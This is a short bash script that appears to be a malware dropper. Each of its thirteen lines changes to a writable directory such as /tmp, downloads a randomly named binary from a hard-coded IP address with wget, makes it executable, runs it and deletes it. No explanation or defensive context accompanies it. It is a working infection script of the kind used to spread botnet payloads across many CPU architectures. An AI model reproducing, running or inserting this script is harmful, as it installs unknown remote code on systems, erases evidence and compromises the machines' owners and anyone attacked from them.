#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/earyzq; chmod +x earyzq; ./earyzq; rm -rf earyzq
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/cemtop; chmod +x cemtop; ./cemtop; rm -rf cemtop
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/vtyhat; chmod +x vtyhat; ./vtyhat; rm -rf vtyhat
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/vvglma; chmod +x vvglma; ./vvglma; rm -rf vvglma
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/nvitpj; chmod +x nvitpj; ./nvitpj; rm -rf nvitpj
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/razdzn; chmod +x razdzn; ./razdzn; rm -rf razdzn
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/lnkfmx; chmod +x lnkfmx; ./lnkfmx; rm -rf lnkfmx
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/qvmxvl; chmod +x qvmxvl; ./qvmxvl; rm -rf qvmxvl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/ajoomk; chmod +x ajoomk; ./ajoomk; rm -rf ajoomk
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/fwdfvf; chmod +x fwdfvf; ./fwdfvf; rm -rf fwdfvf
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/atxhua; chmod +x atxhua; ./atxhua; rm -rf atxhua
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/qtmzbn; chmod +x qtmzbn; ./qtmzbn; rm -rf qtmzbn
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.145.99.108/adcvds; chmod +x adcvds; ./adcvds; rm -rf adcvds
